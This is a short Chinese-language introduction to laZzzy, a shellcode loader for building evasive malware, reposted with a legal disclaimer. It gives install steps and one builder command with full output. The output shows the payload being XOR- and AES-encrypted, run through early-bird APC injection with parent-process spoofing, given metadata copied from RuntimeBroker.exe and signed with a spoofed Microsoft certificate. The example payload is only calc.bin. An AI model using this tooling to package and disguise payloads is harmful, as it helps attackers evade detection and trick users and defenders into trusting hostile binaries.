shellcode 加载器 laZzzy

===================================

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

0x01 工具介绍

laZzzy 是一个 shellcode 加载程序，它演示了恶意软件通常采用的不同执行技术。laZzzy 是使用不同的开源头文件库开发的。

0x02 安装与使用

1、安装需要的库文件

python3 -m pip install -r requirements.txt

2、执行builder.py并提供必要的数据。

(venv) PS C:MalDevlaZzzy> python3 .builder.py -s .calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\Windows\System32\notepad.exe -d www.microsoft.com -b C:\Windows\System32\mmc.exe⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣤⣤⣤⣤⠀⢀⣼⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠀⠀⢀⣀⣀⡀⠀⠀⠀⢀⣀⣀⣀⣀⣀⡀⠀⢀⣼⡿⠁⠀⠛⠛⠒⠒⢀⣀⡀⠀⠀⠀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣰⣾⠟⠋⠙⢻⣿⠀⠀⠛⠛⢛⣿⣿⠏⠀⣠⣿⣯⣤⣤⠄⠀⠀⠀⠀⠈⢿⣷⡀⠀⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⣿⣯⠀⠀⠀⢸⣿⠀⠀⠀⣠⣿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣧⣰⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⠀⠀⠙⠿⣷⣦⣴⢿⣿⠄⢀⣾⣿⣿⣶⣶⣶⠆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀by: CaptMeelo⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠁⠀⠀⠀[+] XOR-encrypting payload with        [*] Key:                        d3b666606468293dfa21ce2ff25e86f6[+] AES-encrypting payload with        [*] IV:                         f96312f17a1a9919c74b633c5f861fe5        [*] Key:                        6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec[+] Modifying template using        [*] Technique:                  Early-bird APC Queue        [*] Process to inject:          None        [*] Process to spawn:           C:\Windows\System32\RuntimeBroker.exe        [*] Parent process to spoof:    svchost.exe[+] Spoofing metadata        [*] Binary:                     C:\Windows\System32\RuntimeBroker.exe        [*] CompanyName:                Microsoft Corporation        [*] FileDescription:            Runtime Broker        [*] FileVersion:                10.0.22621.608 (WinBuild.160101.0800)        [*] InternalName:               RuntimeBroker.exe        [*] LegalCopyright:             © Microsoft Corporation. All rights reserved.        [*] OriginalFilename:           RuntimeBroker.exe        [*] ProductName:                Microsoft® Windows® Operating System        [*] ProductVersion:             10.0.22621.608[+] Compiling project        [*] Compiled executable:        C:MalDevlaZzzyloaderx64ReleaselaZzzy.exe[+] Signing binary with spoofed cert        [*] Domain:                     www.microsoft.com        [*] Version:                    2        [*] Serial:                     33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6        [*] Subject:                    /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com        [*] Issuer:                     /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06        [*] Not Before:                 October 04 2022        [*] Not After:                  September 29 2023        [*] PFX file:                   C:MalDevlaZzzyoutputwww.microsoft.com.pfx[+] All done!        [*] Output file:                C:MalDevlaZzzyoutputRuntimeBroker.exe